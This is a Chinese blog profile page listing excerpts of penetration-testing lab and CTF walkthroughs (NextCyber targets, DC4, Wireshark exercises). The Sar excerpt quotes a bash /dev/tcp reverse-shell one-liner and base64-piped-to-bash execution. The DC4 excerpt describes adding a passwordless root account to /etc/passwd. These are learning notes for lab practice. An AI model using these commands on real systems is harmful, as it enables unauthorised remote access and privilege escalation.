- 博客(21)
- 收藏
- 关注
原创 NextCyber学习记录—渗透靶场symfonos1靶场学习超详细过程分享
该由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
2025-10-26 12:06:45
378
原创 NextCyber学习记录—渗透靶场symfonos3v2靶场学习超详细过程分享
能抓到 FTP 密码:因为 FTP 协议明文传输登录信息,tcpdump可直接捕获。抓到的是实时登录包:对应有人主动登录,或程序(如脚本、定时任务)自动登录的行为,而非服务定时发送的包。在渗透测试中,若抓到 FTP 密码,需结合登录来源(本地/远程)判断其价值——本地自动登录的密码可能属于系统账号或脚本配置,往往是提权的关键线索。使用tcpdump -i lo监听之后发现有pass就是ftp登录了。
2025-10-26 12:04:36
727
原创 NextCyber学习记录—渗透靶场SolidState靶场学习超详细过程分享
学到了jame-admin后台登录的操作然后还有pop3的渗透思路操作命令以及rbash的限制绕过。
2025-10-23 12:54:59
261
原创 NextCyber学习记录—渗透靶场MERCY靶场学习超详细过程分享
该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
2025-10-22 12:20:18
704
原创 NextCyber学习记录—渗透靶场pwnLab靶场学习超详细过程分享
该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
2025-10-22 12:13:47
254
原创 NextCyber学习记录—渗透靶场mrrobot靶场学习超详细过程分享
该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
2025-10-22 12:12:42
215
原创 NextCyber学习记录—渗透靶场DC6靶场学习超详细过程分享
该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
2025-10-22 12:11:17
316
原创 NextCyber学习记录—渗透靶场Sar靶场学习超详细过程分享
发现finally.sh执行了write.sh文件然后write.sh是可以进行写入操作的然后我们写一个反弹shell反弹过来的就有root权限了。这里有个点就是linux中运行的话要bash -c 'bash -i >& /dev/tcp/10.10.62.65/7777 0>&1'bash -i &>/dev/tcp/ip/端口 <&1。-d解密 然后|bash应该是使用bash进行执行。发现 会使用root权限执行 finally.sh。这里我们使用bash反弹然后使用base64编码。
2025-10-22 12:09:26
338
原创 NextCyber学习记录—渗透靶场toppo靶场学习超详细过程分享
使用命令nmap --min-rate 100000 -p- 10.20.110.203。该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。我们查看111端口的功能是什么。这个两个都可以提权我们尝试提权。可能是ssh的登录账户和密码。我们尝试查找suid提权。查看notes.txt。发现网站开放四个端口。然后我们进行目录扫描。发现没有sudo权限。
2025-10-21 16:13:21
281
原创 DC4靶场新手详细教程
admin::0:0:::/bin/bash 我们可以将用户设置成这个格式这个格式的意思是用户是admin 无密码 0是root权限 0是group root一个组别然后 使用 /bin/bashshell。teehee应该是一个类似于echo的东西然后我们可以通过这个teehee来将/etc/passwd中添加一个不需要密码就可以登录的用户并且具有root权限,:::warning /var/spool/mail/ 这个就是系统邮箱的位置了。这个密码文可能是jim的用户密码我们尝试爆破一下。
2025-01-05 15:56:36
446
原创 wireshark0051.pcap数据包
telnet 服务我们这个时候进行过滤我们猜测我们登录的话,服务肯定是telnet的然后可能会带有关键字user pass 这个类的关键字,我们构造过滤式,telnet contains "user"然后提示login successful 这个的时候我们下面的数据包都没有提示说要输入密码了,这个那感觉那个就是登录成功的时候了,这个数据包很奇怪,返回的是successful,追踪一下确实是登录成功了。这个应该是黑客执行的第一个命令,查看版本。先过滤ftp协议看看。这个包让重新输入密码。
2025-01-01 21:04:44
1027
原创 记一次简单的流量分析
登录凭证这个的意思应该是最黑客成功登录的账号和密码,tomcat的登录的信息放在了请求包中关键字是Authorization:Basic我们搜索一下。这里的意思就是黑客是如何持久化的这里有一个技巧就是我们可以使用那个过滤式然后流量从黑客上传的shell开始网下看就完事了。这题的要求是让我们分析确定黑客扫描端口的机子,一般扫描端口的话都会有大量的syn握手包。这个的意思应该是网站的是使用什么搭建的或者是黑客爆破的目录也就是黑客最后想干嘛的目录。这里的意思就是看看黑客使用的目录扫描的工具是什么,
2024-12-30 21:46:50
391
原创 NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)
构造序列化去覆盖,获取flag
2024-01-29 21:34:49
1330
3
原创 [极客大挑战 2019]Http1新手入门教学
BUUCTF 类型:请求头绕过 知识点:http请求头(Referer、X-Forwarded-For、User-Agent)
2023-11-05 19:12:01
583
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅